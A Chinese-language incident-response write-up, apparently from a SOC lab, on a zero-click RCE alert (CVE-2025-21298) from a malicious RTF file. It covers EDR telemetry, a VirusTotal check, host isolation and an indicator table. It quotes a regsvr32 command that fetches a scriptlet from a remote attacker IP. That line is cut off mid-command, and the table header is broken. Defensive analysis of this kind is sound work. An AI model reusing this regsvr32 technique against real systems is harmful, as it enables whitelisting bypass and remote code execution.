使用EDR遥测和静态恶意软件分析,对严重级别的零点击远程代码执行漏洞(CVE-2025-21298)进行技术调查和主机遏制。
本项目记录了针对一次严重级别零点击远程代码执行 (RCE) 尝试的端到端调查与遏制流程。通过 EDR 遥测和威胁情报,我识别出了一次绕过自动化防御并建立命令与控制 (C2) 通信的“离地攻击 (LotL)”。
我识别出事件 ID 314:Windows OLE 零点击 RCE 检测。初始遥测数据显示,恶意文件 mail.rtf 被边界防御系统允许通过,表明工作站 'Austin' 已遭活跃入侵。

我对该文件哈希在 VirusTotal 上进行了信誉检查。结果显示检测率为 25/55,确认该文件为利用 CVE-2025-21298 的武器化 RTF 文件。此漏洞允许通过 Windows 预览窗格实现无需用户交互的远程代码执行。

我转向主机 'Austin' 的 EDR 终端历史记录,以识别后利用行为。发现了一次恶意的“离地攻击 (LotL)”执行:
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) 从远程服务器获取恶意脚本小程序,从而绕过了标准应用程序白名单和传统防病毒签名。

按照 NIST 事件响应框架,优先进行了立即遏制。我对受影响主机执行了网络隔离,以切断 C2 通信并防止其在企业网络内横向移动。

该事件已结案,确认为真实阳性。我记录了攻击者 IP (84.38.130.118) 及取证证据,供威胁情报团队和防火墙团队使用,以防止今后再次发生类似事件。

| 类型 | 值 |
|---|
| C2 IP 地址 | 84.38.130.118 |
| 文件哈希 (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| 漏洞 | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - 已签名二进制代理执行:Regsvr32 |